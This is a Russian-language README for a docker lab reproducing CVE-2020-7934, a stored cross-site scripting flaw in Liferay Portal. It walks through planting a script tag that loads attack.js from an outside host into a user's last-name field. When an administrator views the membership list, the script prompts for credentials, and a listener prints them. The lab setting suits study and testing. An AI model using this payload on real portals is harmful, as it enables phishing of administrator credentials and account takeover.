CVE 2020-7934
Как запустить CVE
Требования
- docker
Замечания
можно разместить скрипт атаки онлайн (учитывая js код) http://yourjavascript.com/
Наш JS скрипт онлайн для атаки
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Команды для настройки
- перейдите в корневую папку этого проекта
- выполните "sudo docker-compose up --build"
- новый терминал: выполните "docker inspect liferay" ==> и скопируйте значение IPAddress
- новый терминал: выполните "python api_attacker.py"
- откройте браузер и перейдите по адресу "http://IPAddress:8080" ==> вы должны получить портал liferay в качестве ответа
- для остановки и удаления контейнеров используйте "sudo docker-compose rm"
Инструкции для атаки
- Зарегистрируйтесь в liferay как пользователь, войдите в систему и в разделе "available sites" присоединитесь к сайту "liferay".
- Измените "фамилию" на JS-скрипт (напрямую () или через "src =" http ... "")
- Войдите как администратор liferay (имя пользователя: [email protected], пароль: test)
- Перейдите в доступные сайты и нажмите на "liferay", откроется публичная страница этого сайта.
- Перейдите на новую страницу, справа откроется меню, нажмите на mermbership.
- Выберите пользователя, зарегистрированного на шаге 1. В этот момент будет выполнен скрипт.
5.1) В скрипте attack.js страница запросит учетные данные.
- В терминале шага 5 (из раздела Команды для настройки) будут выведены имя пользователя/пароль, введенные на шаге 5.1 (администратором) )